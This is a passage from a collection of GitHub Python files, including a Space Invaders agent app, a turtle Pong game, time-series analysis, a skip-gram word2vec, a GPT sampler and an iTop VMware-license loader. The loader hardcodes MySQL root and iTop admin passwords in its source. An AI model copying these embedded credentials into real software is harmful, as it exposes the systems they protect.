orders\r\n","repo_name":"play2323/tradingbots","sub_path":"trading_bot/exchange_api/init.py","file_name":"init.py","file_ext":"py","file_size_in_byte":2347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20923764501","text":"import streamlit as st\n# import tensorflow as tf\nfrom tensorflow import keras\nimport numpy as np\n\nimport gym\nfrom gym.wrappers.atari_preprocessing import AtariPreprocessing\nfrom gym.wrappers.frame_stack import FrameStack\n\n\nLOCAL_MODEL = 
r'../modelling/saved-models/Student_Teacher_BestModel-ep500.h5'\n\n### Helper functions\n\ndef instantiate_environmnent():\n env = gym.make(\"SpaceInvadersNoFrameskip-v4\")\n env = AtariPreprocessing(env, grayscale_newaxis=True, frame_skip=5)\n env = FrameStack(env, 4)\n\n return env\n\ndef load_model(model_h5=LOCAL_MODEL):\n model = keras.models.load_model(model_h5)\n return model\n\n### End Helper Funtions\n\n# Instantiate\n\nenv = instantiate_environmnent()\nmodel = load_model()\n\nst.set_page_config(layout='wide')\n\n\n### Sidebar\n\n# st.sidebar.title('BIGCHAMP-900')\n\n# st.sidebar.markdown(\"\"\"## Time to save the world!\"\"\")\n# episodes = st.sidebar.expander('N games').slider('', 1, 10, 5)\n# start_model = st.sidebar.button(\"BLAST OFF!\")\n# stop_model = st.sidebar.button(\"Stand down Champ!\")\n\nst.sidebar.markdown('''\n Team:\n - Alex Gribius\n - Dan Hawkins\n - Alberto Lopez Rueda\n - Lorcan Rae\n\n With thanks to Oliver Giles\n ''')\n\n\n### Main\n\ncol1, col2 = st.columns([1, 1])\n\nwith col2:\n st.title('BIGCHAMP-900')\n st.markdown(\"\"\"## Time to save the world!\"\"\")\n episodes = st.slider('N Games', 1, 10, 5)\n start_model = st.button(\"BLAST OFF!\")\n stop_model = st.button(\"Stand down Champ!\")\n\nDISPLAY_WIDTH = 420\n\nwith col1:\n\n if start_model:\n\n with st.empty():\n\n for episode in range(1, episodes+1):\n state = np.asarray(env.reset()).reshape(84, 84, 4)\n done = False\n score = 0\n\n while not done:\n batch_state = np.expand_dims(state, 0)\n action = np.argmax(model.predict(batch_state)[0])\n state, reward, done, info = env.step(action)\n state = np.asarray(state).reshape(84, 84, 4)\n score += reward\n st.image(env.render(mode='rgb_array'), width=DISPLAY_WIDTH)\n\n if stop_model:\n break\n\n else:\n with st.empty():\n state = np.asarray(env.reset()).reshape(84, 84, 4)\n st.image(env.render(mode='rgb_array'), width=DISPLAY_WIDTH)\n","repo_name":"AlexanderGribius/space-invaders","sub_path":"website/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"580435056","text":"import turtle\n\nsc = turtle.Screen()\nsc.setup(width = 1000 , height = 800)\nsc.bgcolor(\"black\")\nsc.title(\"Pong\")\n\n#MENU :\n\nmenu = turtle.Turtle()\nmenu.speed(0)\nmenu.penup()\nmenu.ht()\nmenu.setx(-95)\nmenu.sety(250)\nmenu.pendown()\nmenu.color(\"green\")\nmenu.write(\"Pong NSI\", move=False, align='left', font=('Spectral', 50, 'normal'))\n\nmenu.penup()\nmenu.setx(-205)\nmenu.sety(0)\nmenu.pendown()\nmenu.color(\"green\")\nmenu.write(\"Presser SPACE pour commencer\", move=False, align='left', font=('Spectral', 30, 'normal'))\nmenu.penup()\nmenu.setx(-300)\nmenu.sety(- 40)\nmenu.pendown()\nmenu.color(\"green\")\nmenu.write(\"Presser SPACE de nouveau pour recommencer\", move=False, align='left', font=('Arial', 30, 'normal'))\n\n#SCORE :\n\ns1 = turtle.Turtle()\ns1.speed(0)\ns1.penup()\ns1.ht()\ns1.setx(-250)\ns1.sety(200)\ns1.pendown()\ns1.color(\"green\")\n\ns2 = turtle.Turtle()\ns2.speed(0)\ns2.penup()\ns2.ht()\ns2.setx(250)\ns2.sety(200)\ns2.pendown()\ns2.color(\"green\")\n\n#GAME OVER:\n\nover = turtle.Turtle()\nover.speed(0)\nover.penup()\nover.ht()\nover.setx(-100)\nover.sety(0)\nover.pendown()\nover.setx(-180)\nover.sety(0)\nover.pendown()\nover.color(\"red\")\n\n#COMMENCER JEU :\n\ndef gamestart():\n menu.clear()\n main()\n \n#RESTART :\n \ndef restart():\n sc.clear()\n sc.setup(width = 1000 , height = 800)\n sc.bgcolor(\"black\")\n 
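# restart() calls sc.clear() first, which wipes every turtle and screen setting,\n    # so the window has to be fully re-initialised here before main() runs again\n    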
sc.title(\"Pong\")\n main()\n \n \n#GAME :\n\ndef main():\n global over\n global s1\n global s2\n \n #LIMITE :\n limite = turtle.Turtle()\n limite.penup()\n limite.color(\"green\")\n limite.width(5)\n limite.speed(0)\n limite.ht()\n limite.goto(-470, -370)\n limite.pd()\n limite.goto(470, -370)\n limite.goto(470, 370)\n limite.goto(-470, 370)\n limite.goto(-470, -370)\n limite.speed(0)\n \n #BALLE:\n \n balle = turtle.Turtle()\n balle.shape(\"circle\")\n balle.color(\"green\")\n balle.penup()\n balle.goto(0,0)\n balle.speed()\n \n #MOUVEMENT :\n \n move_x = 1\n move_y = 1 \n \n #RAQUETTE 1 :\n \n r1 = turtle.Turtle()\n r1.speed(0)\n r1.shape(\"square\")\n r1.speed(0)\n r1.setheading(90)\n r1.shapesize(1,5)\n r1.penup()\n r1.goto(-450, 0)\n r1.color(\"green\")\n\n #RAQUETTE 2 :\n \n r2 = turtle.Turtle()\n r2.shape(\"square\")\n r2.speed(0)\n r2.setheading(90)\n r2.shapesize(1,5)\n r2.penup()\n r2.goto(450, 0)\n r2.color(\"green\")\n\n\n #SCORE :\n\n score_r1 = 0 \n score_r2 = 0 \n \n s1.write(score_r1, move=False, align='left', font=('Spectral', 50, 'normal'))\n s2.write(score_r2, move=False, align='left', font=('Spectral', 50, 'normal'))\n\n #MOUVEMENT BALLE:\n def r1_up():\n r1.penup()\n r1.fd(25)\n \n def r2_up():\n r2.penup()\n r2.fd(25)\n\n def r1_down():\n r1.penup()\n r1.bk(25)\n \n def r2_down():\n r2.penup()\n r2.bk(25) \n \n sc.listen()\n sc.onkeypress(r1_up, \"w\")\n sc.onkeypress(r2_up, \"Up\")\n sc.onkeypress(r1_down, \"s\")\n sc.onkeypress(r2_down, \"Down\")\n \n #UPDATE :\n\n while True:\n sc.update()\n sc.tracer(0)\n \n x = balle.xcor() + move_x\n y = balle.ycor() + move_y\n balle.setx(x)\n balle.sety(y)\n\n \n #COLLISION:\n \n #DROITE ET GAUCHE :\n if balle.xcor() > 450:\n balle.goto(0,0) #restart\n balle.speed(0)\n score_r1 += 1\n s1.clear()\n s1.write(score_r1, move=False, align='left', font=('Arial', 50, 'normal'))\n \n if balle.xcor() < -450:\n balle.goto(0,0) #restart\n balle.speed(0)\n score_r2 += 1\n s2.clear()\n s2.write(score_r2, move=False, align='left', font=('Arial', 50, 'normal'))\n \n # TOP :\n if balle.ycor() > 360 :\n balle.sety(360)\n move_y = move_y * -1\n \n #BOTTOM :\n if balle.ycor() < -360 :\n balle.sety(-360)\n move_y = move_y * -1\n \n #RAQUETTES : \n \n if r1.ycor() + 50 > 360:\n r1.sety(330)\n r1_down()\n \n if r2.ycor() + 50 > 360:\n r2.sety(330)\n r2_down()\n \n if r1.ycor() - 50 < -360:\n r1.sety(-330)\n r1_up()\n \n if r2.ycor() - 50 < -360:\n r2.sety(-330)\n r2_up()\n \n if balle.ycor() < r2.ycor() + 60 and balle.ycor() > r2.ycor() - 60 and balle.xcor() > 440 and balle.xcor() < 450:\n balle.setx(440)\n move_x = move_x * -1\n \n if balle.ycor() < r1.ycor() + 60 and balle.ycor() > r1.ycor() - 60 and balle.xcor() <- 440 and balle.xcor() > -450:\n balle.setx(-440)\n move_x = move_x * -1 \n \n #RESULTAT : \n \n if score_r1 == 10 :\n over.write(\"Player 1 Won !!!\", move=False, align='left', font=('Spectral', 50, 'normal'))\n break\n \n if score_r2 == 10 :\n over.write(\"Player 2 Won !!!\", move=False, align='left', font=('Spectral', 50, 'normal'))\n break\n \n sc.listen()\n sc.onkeypress(restart, \"space\")\n \n\nsc.listen()\nsc.onkeypress(gamestart, \"space\")","repo_name":"jdolivet/NSI-Projets","sub_path":"Premiere/2022/Projet-2/Pong/pong_final.py","file_name":"pong_final.py","file_ext":"py","file_size_in_byte":5242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20061958441","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pylab as plt\nfrom matplotlib.pylab import 
rcParams\nrcParams['figure.figsize'] = 10,6\nimport datetime as dt\nfrom statsmodels.tsa.stattools import adfuller\nfrom statsmodels.tsa.seasonal import seasonal_decompose\nfrom statsmodels.tsa.filters.hp_filter import hpfilter\nfrom statsmodels.tsa.stattools import acf, pacf\n\n#First import to check the data was imported correctly; cleaned in R so shouldn't be a problem\npath = \"E:/BigDataAnalytics/eChat/Analysis/\"\nfile_ts_data = \"contactsbytype.csv\"\nfile_stats_2015 = \"contacts&statsbytype2015.csv\"\n\ndef read_data(path,filename):\n data = pd.read_csv(path+filename)\n return data\n \ndata1 = read_data(path,file_ts_data)\ndata2 = read_data(path, file_stats_2015)\n\n#data1.head()\n#data2.head()\n\n#Import the data and overwrite the pandas dataframe currently storing the time series data with date parser \n#object converted to datetime \ndateparse = lambda dates: dt.datetime.strptime(dates, '%d-%b-%y')\ndata = pd.read_csv(path+file_stats_2015, parse_dates=['DATE_OF_CALL'], index_col = 'DATE_OF_CALL', date_parser=dateparse)\nprint(data.head())\nprint(data.columns.values,sep='\\n', end='\\n')\n\n#Set the timeseries data\n#count\nts_outboundcall = data['COUNT_OF_CONTACTS.Outbound Call']\nts_outboundcall = ts_outboundcall.sort_index()\n#Effort\n\nts_offline = data['COUNT_OF_CONTACTS.Offline']\nts_offline = ts_offline.sort_index()\n\nts_chat = data['COUNT_OF_CONTACTS.Chat']\nts_chat = ts_chat.sort_index()\n\nts_email = data['COUNT_OF_CONTACTS.Inbound Email']\nts_email = ts_email.sort_index()\n\nts_voice = data['COUNT_OF_CONTACTS.Inbound Call']\nts_voice = ts_voice.sort_index()\n\nts_voice_xfer = data['COUNT_OF_CONTACTS.Inbound Call XFER']\nts_voice_xfer = ts_voice_xfer.sort_index()\n\nts_letter = data['COUNT_OF_CONTACTS.Letter - Inbound']\nts_letter = ts_letter.sort_index()\n\n\n#Initial plot of the two time series for chat and inbound voice answered\nfig1 = plt.figure()\nplt.plot(ts_voice_xfer)\nplt.plot(ts_voice)\nplt.plot(ts_outboundcall)\nplt.legend(loc='best')\n\nfig_digi = plt.figure()\nplt.plot(ts_chat)\nplt.plot(ts_offline)\nplt.plot(ts_email)\nplt.plot(ts_letter)\nplt.legend(loc='best')\n\ndef test_stationarity(timeseries, title=\"\"):\n #determing the rolling statistics\n rollmean = timeseries.rolling(center=False, window = 7).mean()\n rolstd = timeseries.rolling(center=False, window = 7).std()\n\n #Plot rolling stats\n fig = plt.figure()\n #orig = plt.plot(timeseries, color='blue', label = 'Orginal')\n mean = plt.plot(rollmean, color = 'red', label = \"Rolling Mean\")\n std = plt.plot(rolstd, color = 'black', label = 'Rolling Std')\n plt.legend(loc='best')\n plt.title(title+' Rolling Mean & Standard Deviation')\n \n #Perform Dickey-Fuller Test:\n print('Results from Dickey Fuller test: '+title)\n dftest = adfuller(timeseries, autolag = 'AIC')\n dfoutput = pd.Series(dftest[0:4], \n index=['Test Statistic', \n 'p-value', \n '#Lags Used', \n 'Number of Observations Used'])\n for k,v in dftest[4].items():\n dfoutput['Critical Value (%s)'%k] = v \n print(dfoutput)\n\ndef test_stationarity_AUG(timeseries1, timeseries2, title:list):\n #determing the rolling statistics\n win = 30\n rollmean1 = timeseries1.rolling(center=False, window = win).mean()\n #rolstd1 = timeseries1.rolling(center=False, window = 30).std()\n rollmean2 = timeseries2.rolling(center=False, window = win).mean()\n #rollstd2 = timeseries2.rolling(center =False, window =30).std()\n #Plot rolling stats\n fig = plt.figure()\n #orig = plt.plot(timeseries, color='blue', label = 'Orginal')\n mean1 = plt.plot(rollmean1, 
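# the 30-day rolling window smooths daily noise so the two contact channels' trends can be compared\n                     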
color = 'darkviolet', linewidth = 2, label = \"%s day Rolling Mean %s\"%(win,title[0]))\n mean2 = plt.plot(rollmean2, color = 'slateblue', linewidth = 2,label = \"%s day Rolling Mean %s\"%(win,title[1]))\n #std1 = plt.plot(rolstd1, color = 'black', label = 'Rolling Std')\n plt.legend(loc='best')\n plt.title('Total Contacts for %s and %s Rolling Mean'%(title[0],title[1]))\n plt.savefig('%s_%s_Rolling_Mean'%(title[0],title[1]))\n\ntest_stationarity_AUG(ts_chat.dropna(), ts_voice.dropna(), ['Chat', 'Voice'])\nls = [ts_chat.dropna(), ts_voice.dropna(), ts_voice_xfer.dropna(), ts_outboundcall.dropna(), ts_offline.dropna()]\nls_names = ['Chat', 'Inbound Voice', 'Inbound Voice XFER', 'Oubound Voice', 'Offline']\n\ndef process_ts(ls: list, names: list):\n count = 0\n for i in ls:\n test_stationarity(i, names[count])\n count = count+ 1\n\nprocess_ts(ls, ls_names)\n\n#decomposition\ndef decomp_ts(timeseries, name:str, freq:int):\n\n decomposition = seasonal_decompose(timeseries, freq=freq)\n trend = decomposition.trend\n seasonal = decomposition.seasonal\n residual = decomposition.resid\n fig = plt.figure()\n plt.subplot(411)\n plt.plot(timeseries, label=name+' Original')\n plt.legend(loc='best')\n plt.subplot(412)\n plt.plot(trend, label=name+' Trend')\n plt.legend(loc='best')\n plt.subplot(413)\n plt.plot(seasonal,label=name+' Seasonality')\n plt.legend(loc='best')\n plt.subplot(414)\n plt.plot(residual, label=name+' Residuals')\n plt.legend(loc='best')\n plt.tight_layout()\n return trend, seasonal, residual, decomposition\n\nt,s,r,d = decomp_ts(ts_chat.dropna(), 'Chat', 90)\ntest_stationarity(residual.dropna())\n\nlag_acf = acf(residual.dropna(), nlags=20)\nlag_pacf = pacf(residual.dropna(), nlags=20, method='ols')\n\nplt.subplot(121) \nplt.plot(lag_acf)\nplt.axhline(y=0,linestyle='--',color='gray')\nplt.axhline(y=-1.96/np.sqrt(len(residual.dropna())),linestyle='--',color='gray')\nplt.axhline(y=1.96/np.sqrt(len(residual.dropna())),linestyle='--',color='gray')\nplt.title('Autocorrelation Function')\n\nplt.subplot(122)\nplt.plot(lag_pacf)\nplt.axhline(y=0,linestyle='--',color='gray')\nplt.axhline(y=-1.96/np.sqrt(len(residual.dropna())),linestyle='--',color='gray')\nplt.axhline(y=1.96/np.sqrt(len(residual.dropna())),linestyle='--',color='gray')\nplt.title('Partial Autocorrelation Function')\nplt.tight_layout()\n\n#hpfilter\ncycle, trend = hpfilter(ts_chat.dropna(), 6.25)\nfig = plt.figure()\nplt.plot(cycle)\nplt.plot(trend)\nplt.plot(ts_chat.dropna())\n\ncycle, trend = hpfilter(ts_voice.dropna(), 6.25)\nfig = plt.figure()\nplt.plot(cycle)\nplt.plot(trend)\nplt.plot(ts_voice.dropna())\n\n#########################################################################\n## substitution data breakdown for bar chart\n#########################################################################\n\nf_sub = \"substitution_data_final.csv\"\nsub_data = pd.read_csv(path+f_sub, parse_dates=['DATE_OF_CALL'], \n index_col = 'DATE_OF_CALL', date_parser=dateparse)\n\ngenerated = sub_data['generated'] - sub_data['COUNT_OF_CONTACTS']\n\nsub_data['gen_final'] = generated \npercentage = (sub_data['COUNT_OF_CONTACTS.Chat'] - \n sub_data['gen_final'])/sub_data['COUNT_OF_CONTACTS.Chat']*100\nsub_data['subs_percent'] = percentage\nsub_data = sub_data[sub_data.index.year < 2017]\n\nM_sub_avgs = sub_data.groupby(by =[sub_data.index.month, sub_data.index.year]).mean()\n\nM_sub_sdevs = sub_data.groupby(by = [sub_data.index.month, sub_data.index.year]).std()\n\nmths = np.arange(12)\nmths_names = 
['Jan','Feb','Mar','Apr','May','Jun','Jul','Aug','Sep','Oct','Nov','Dec']\n\nfig,ax1 = plt.subplots()\n\np1 = ax1.bar(mths, M_sub_avgs['COUNT_OF_CONTACTS.x'], \n             width = 0.5, yerr=M_sub_sdevs['COUNT_OF_CONTACTS.x'],\n             color='darkslateblue',\n             label = 'Direct Substitutions')\np2 = ax1.bar(mths, M_sub_avgs['COUNT_OF_CONTACTS.y'], \n             width = 0.5, bottom = M_sub_avgs['COUNT_OF_CONTACTS.x'],\n             yerr=M_sub_sdevs['COUNT_OF_CONTACTS.y'],\n             color='blueviolet',\n             label = 'New BB')\np3 = ax1.bar(mths, M_sub_avgs['COUNT_OF_CONTACTS'], \n             width = 0.5, yerr=M_sub_sdevs['COUNT_OF_CONTACTS'],\n             bottom=[i+j for i,j in zip(M_sub_avgs['COUNT_OF_CONTACTS.x'],M_sub_avgs['COUNT_OF_CONTACTS.y'])],\n             color = 'mediumorchid',\n             label = 'Tenured Customers with no complaint history')\np4 = ax1.bar(mths, M_sub_avgs['gen_final'], \n             width = 0.5, yerr=M_sub_sdevs['gen_final'],\n             bottom=[i+j+k for i,j,k in zip(M_sub_avgs['COUNT_OF_CONTACTS.x'],\n                                            M_sub_avgs['COUNT_OF_CONTACTS.y'],\n                                            M_sub_avgs['COUNT_OF_CONTACTS'])],label = 'Generated',color = 'indianred')\n\nplt.ylabel('Chat Contacts (count)')\nplt.title('Chat Substitution: Breakdown of substitution types by month')\nplt.xticks(mths,mths_names)\n\nax2 = ax1.twinx()\np5 = ax2.plot(mths, M_sub_avgs['subs_percent'], '--r', linewidth = 2, label = 'percentage_substituted')\nax2.set_ylim([0,100])\nax1.legend(loc='upper center', bbox_to_anchor=(0.5, -0.05),\n           ncol=3, fancybox=True, shadow=True)\nax2.legend(loc='best')\nfig.tight_layout()\nfig.savefig(\"chat_volume_breakdown.png\")\n\n\n\n","repo_name":"tmrob2/chat","sub_path":"substitution.py","file_name":"substitution.py","file_ext":"py","file_size_in_byte":9024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"27037077333","text":"# Implementing a skip-gram model with negative sampling at a low level\n\nfrom nltk.stem import LancasterStemmer\nimport nltk\nfrom sklearn.metrics.pairwise import cosine_similarity\nimport numpy as np\nimport pandas as pd\nfrom tensorflow.keras.layers import Input, Dense, Embedding, Flatten, Activation, Dot\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras.optimizers import Adam\n\nnltk.download('punkt')\nnltk.download('gutenberg')\ntext_id = nltk.corpus.gutenberg.fileids()\nprint(text_id)\n\n# Load 10 English novels\ntext1 = nltk.corpus.gutenberg.raw('austen-emma.txt')\ntext2 = nltk.corpus.gutenberg.raw('austen-persuasion.txt')\ntext3 = nltk.corpus.gutenberg.raw('austen-sense.txt')\ntext4 = nltk.corpus.gutenberg.raw('bible-kjv.txt')\ntext5 = nltk.corpus.gutenberg.raw('blake-poems.txt')\ntext6 = nltk.corpus.gutenberg.raw('bryant-stories.txt')\ntext7 = nltk.corpus.gutenberg.raw('burgess-busterbrown.txt')\ntext8 = nltk.corpus.gutenberg.raw('carroll-alice.txt')\ntext9 = nltk.corpus.gutenberg.raw('chesterton-ball.txt')\ntext10 = nltk.corpus.gutenberg.raw('chesterton-brown.txt')\n\ntext = text1 + ' ' + text2 + ' ' + text3 + ' ' + text4 + ' ' + text5 + ' ' + text6 + ' ' + text7 + ' ' + text8 + ' ' + text9 + ' ' + text10\n\nsentences = nltk.sent_tokenize(text)\nprint(len(sentences))\nprint(sentences[:10])\n\nsen = []\nfor s in sentences:\n    s = s.replace('\\n', ' ').replace(\"'\", '').replace('.', '').replace('-', '').replace('!', '').replace('?', '').replace(';', '').replace(',', '').replace('_', '').replace('(', '').replace(')', '').replace(':', '').replace('\"', \"\").replace('[', '').replace(']', '').strip().lower()\n    sen.append(s)\n    \nstemmer = LancasterStemmer()\nword_tokens = [nltk.word_tokenize(s) for s in sen]\n\n# Stem each token and store the results in the stem list\nstem = []\ntmp 
= []\nfor s in word_tokens:\n    for t in s:\n        tmp.append(stemmer.stem(t))\n    stem.append(tmp)\n    tmp = []\n\n# Sentences shorter than 3 tokens break trigram construction, so drop them\nfor s in stem:\n    if len(s) < 3:\n        stem.remove(s)\nlen(stem)\n\n# Build the full token list for the vocabulary\nall_tokens = []\nfor s in stem:\n    for t in s:\n        all_tokens.append(t)\nlen(all_tokens)\n\n# word -> idx\nfrom tensorflow.keras.preprocessing.text import Tokenizer\n\ntokenizer = Tokenizer()\ntokenizer.fit_on_texts(all_tokens)\n\nword2idx = tokenizer.word_index\nidx2word = {v:k for k, v in word2idx.items()}\n\nto_idx = tokenizer.texts_to_sequences(stem)\n\n# Build tri-grams sentence by sentence\ntrigram = []\ntmp = []\nfor s in to_idx:\n    # pad_right=True pads with None, e.g. (1388, 21, None), when a full trigram cannot be formed\n    for a, b, c in nltk.ngrams(s, 3, pad_right=True): \n        tmp.append((a, b, c))\n    trigram.append(tmp)\n    tmp = []\nlen(trigram)\n\n# Assuming k = 2,\nx_1 = [] # love, love, love, love, love, love\nx_2 = [] # I, you, rand_sample, rand_sample, rand_sample, rand_sample\ny = [] # should hold 1, 1, 0, 0, 0, 0\n\n# Build the x_1 data\nfor i in range(len(trigram)):\n    for j in range(len(trigram[i])):\n        for k in range(6):\n            x_1.append(trigram[i][j][1])\n    \nprint(x_1[:200])\n\nimport random\n# Build the x_2 data - positive sampling\nfor i in range(len(trigram)):\n    for j in range(len(trigram[i])):\n        for k in range(0, 3, 2):\n            x_2.append(trigram[i][j][k])\n            y.append(1)\n        \n        # Negative sampling, 4 draws\n        for q in range(4):\n            x_2.append(random.randint(1, 21948)) # max(word2idx.values()) == 21948\n            y.append(0)\n        \nprint(x_2[:200])\nprint(y[:200])\n\n# Build a DataFrame from the lists\ndf = pd.DataFrame({\n    'input_1' : x_1,\n    'input_2' : x_2,\n    'label' : y\n})\n\ndf.dropna(axis=0, inplace=True)\ndf = df.sample(frac=1).reset_index(drop=True)\n\n# Build the dataset\nX_1_train = np.array(df['input_1']).reshape(-1, 1)\nX_2_train = np.array(df['input_2']).reshape(-1, 1)\ny_train = np.array(df['label']).reshape(-1, 1)\nvocab_size = len(word2idx)+1 # the +1 would be unnecessary if word2idx started at 0; 
the Embedding layer indexes from 0, so it needs the +1.\n\n# Model definition for training\nx_1_input = Input(batch_shape = (None, X_1_train.shape[1]))\nx_2_input = Input(batch_shape = (None, X_2_train.shape[1]))\n\nx_1_emb = Embedding(input_dim = vocab_size, output_dim = 32)(x_1_input)\nx_1_emb = Flatten()(x_1_emb)\n\nx_2_emb = Embedding(input_dim = vocab_size, output_dim = 32)(x_2_input)\nx_2_emb = Flatten()(x_2_emb)\n\nhidden = Dot(axes=1)([x_1_emb, x_2_emb])\ny_output = Activation('sigmoid')(hidden)\n\nmodel = Model([x_1_input, x_2_input], y_output)\nmodel.compile(loss='binary_crossentropy', optimizer=Adam(learning_rate=0.001))\n\n# Model for reading off the word --> word2vec mapping (used only for predict)\nmodel_w = Model(x_2_input, x_2_emb) # Model(x_1_input, x_1_emb) would work just as well\n\nmodel.summary()\n\nhist = model.fit([X_1_train, X_2_train], y_train, epochs=20, batch_size=8192, validation_split=0.2)\n\nfather = model_w.predict(np.array(word2idx[stemmer.stem('father')]).reshape(1, 1))\nprint(father)\n\nmother = model_w.predict(np.array(word2idx[stemmer.stem('mother')]).reshape(1, 1))\nprint(mother)\n\ndoctor = model_w.predict(np.array(word2idx[stemmer.stem('doctor')]).reshape(1, 1))\nprint(doctor)\n\nfather_mother = cosine_similarity(mother, father)\nprint(father_mother)\n\nmother_doctor = cosine_similarity(mother, doctor)\nprint(mother_doctor)\n\nfather_doctor = cosine_similarity(father, doctor)\nprint(father_doctor)","repo_name":"dobbytk/NLP_study","sub_path":"Multicampus/NLP/day22/negative_smp_skipgram.py","file_name":"negative_smp_skipgram.py","file_ext":"py","file_size_in_byte":5327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"40756916612","text":"from sqlalchemy import create_engine\nimport re\nfrom pandas import Series, DataFrame, concat\nimport pandas as pd\nfrom pymongo import MongoClient\nimport subprocess as t\nimport logging\nfrom logging.config import fileConfig\nimport configparser\n\nfileConfig('logger_config.ini')\nlogger=logging.getLogger('infoLogger')\n\nclass LoadVMwareLicense():\n\n    def __init__(self):\n        self.cfg = configparser.ConfigParser()\n        self.cfg.read(\"config.ini\") \n        cmdb_db = self.cfg.get(\"cmdb\",\"db\")\n        cmdb_str = self.cfg.get(\"cmdb\",\"conn_str\")\n        self.client = MongoClient(cmdb_str)\n        self.db = self.client[cmdb_db]\n        \n        self.engine = create_engine(\n            \"mysql+pymysql://root:Password1@127.0.0.1:3306/itop?charset=utf8\", encoding=\"utf-8\", echo=False)\n\n    def load_to_itopdb(self, df, source_table_name):\n        self.engine.execute(\"delete from %s\" % source_table_name)\n        df.to_sql(source_table_name, con=self.engine,\n                  if_exists='append', index=False)\n\n    def apply_by_php(self, source_table_name):\n        source_table_id = source_table_name.split('_').pop()\n        php_cmd = \"php -q /itop_data/http_dir/itop/synchro/synchro_exec.php --auth_user=%s --auth_pwd=%s --data_sources=%s\" % (\n            'admin', 'Password1', source_table_id)\n        output = t.getoutput(php_cmd)\n        logger.info(output + \"\\n\")\n\n    def get_vmware_license_src_df(self):\n        vmware_license_coll = self.db['merge_vmware_license']\n        vmware_license_df = pd.DataFrame(list(vmware_license_coll.find()))\n\n        prefix = 'merge_'\n        col_dict = {}\n        for col in vmware_license_df.columns:\n            if prefix in col:\n                col_dict[col] = col.split(prefix)[1]\n\n        # logger.info(vmware_license_df.rename(columns=col_dict))\n\n        vmware_license_src_df = vmware_license_df.rename(columns=col_dict).assign(org_id=lambda x:1).assign(primary_key=lambda x:x['license_key']).assign(perpetual=lambda x:'yes').assign(licence_key=lambda 
x:x['license_key']).assign(software_id=lambda x:1)[['name','org_id','usage_limit','licence_key','perpetual','environment','used','primary_key','software_id']]\n\n return vmware_license_src_df\n\n def main(self):\n vmware_license_src_df = self.get_vmware_license_src_df()\n self.load_to_itopdb(\n df=vmware_license_src_df, source_table_name='synchro_data_vmwarelicense_103')\n self.apply_by_php(source_table_name='synchro_data_vmwarelicense_103')\n\n\nif __name__ == '__main__':\n license = LoadVMwareLicense()\n license.main()\n","repo_name":"yyztc/itop","sub_path":"load_vmware_license.py","file_name":"load_vmware_license.py","file_ext":"py","file_size_in_byte":2568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72947115892","text":"import os\nimport numpy as np\n\nimport torch\nimport torch.nn as neuralnetwork\nfrom torch.nn import functional as functional\n\nimport tiktoken\nfrom model import GenerativePretrainedTransformer, Config\n\nfrom halo import Halo\n\n\n\n# hyperparameters #\nencodeMethod = 'r50k_base'\nmaxNewTokens = 32 # number of tokens per sample\nprintConsole = False\nwriteToFile = True\n\nresumeDir = os.path.join('gpt', 'resume')\noutDir = os.path.join('gpt', 'output')\ncontextDir = os.path.join('gpt', 'context')\ndevice = 'cuda' if torch.cuda.is_available() else 'cpu'\n###################\n\n\n\n# model init\nckpt_path = os.path.join(resumeDir, os.listdir(resumeDir)[0])\ncheckpoint = torch.load(ckpt_path, map_location=device)\n\nprint(f\"Loaded model from {ckpt_path}\")\n\nconfig = Config(**checkpoint['modelArgs'])\nmodel = GenerativePretrainedTransformer(config)\n\nmodel.load_state_dict(checkpoint['model'])\n\nmodel.to(device)\n\nprint('Model has', sum(p.numel() for p in model.parameters()), 'parameters')\n\n\n# sampling\ndef sample():\n samplingLoading = Halo(text='Sampling: ', spinner='line', color='white', placement='right')\n samplingLoading.start()\n\n encoding = tiktoken.get_encoding(encodeMethod)\n\n contextFile = os.path.join(contextDir, os.listdir(contextDir)[0])\n\n with open(contextFile, 'r', encoding='utf-8') as file:\n contextString = file.read()\n\n contextIds = encoding.encode(contextString, allowed_special={'<|endoftext|>'})\n contextIds = contextIds[-96:]\n\n contextInput = (torch.tensor(contextIds, dtype=torch.long, device=device)[None, ...])\n\n\n with torch.no_grad():\n\n y = encoding.decode(model.generate(contextInput, maxNewTokens)[0].tolist()[-32:])\n\n if printConsole:\n print(f'\\n{y}')\n \n if writeToFile:\n newFile = os.path.join(outDir, 'sample.txt')\n\n open(newFile, 'w', encoding=\"utf-8\").write(y)\n\n\n samplingLoading.stop()","repo_name":"littlejohny2/discordbot","sub_path":"gpt/sample.py","file_name":"sample.py","file_ext":"py","file_size_in_byte":1896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73504075251","text":"from flask import Flask, render_template\r\nimport dash\r\n\r\napp = Flask(__name__)\r\n\r\ndash_app = dash.Dash(\r\n __name__,\r\n server=app,\r\n routes_pathname_prefix='/dash/',\r\n external_stylesheets=['/static/css/styles.css']\r\n)\r\n\r\n@app.route('/')\r\ndef index():\r\n return render_template('index.html')\r\n","repo_name":"Yellowbaron/dash","sub_path":"app/flask_app.py","file_name":"flask_app.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71790926772","text":"#coding:utf-8\n\nfrom 
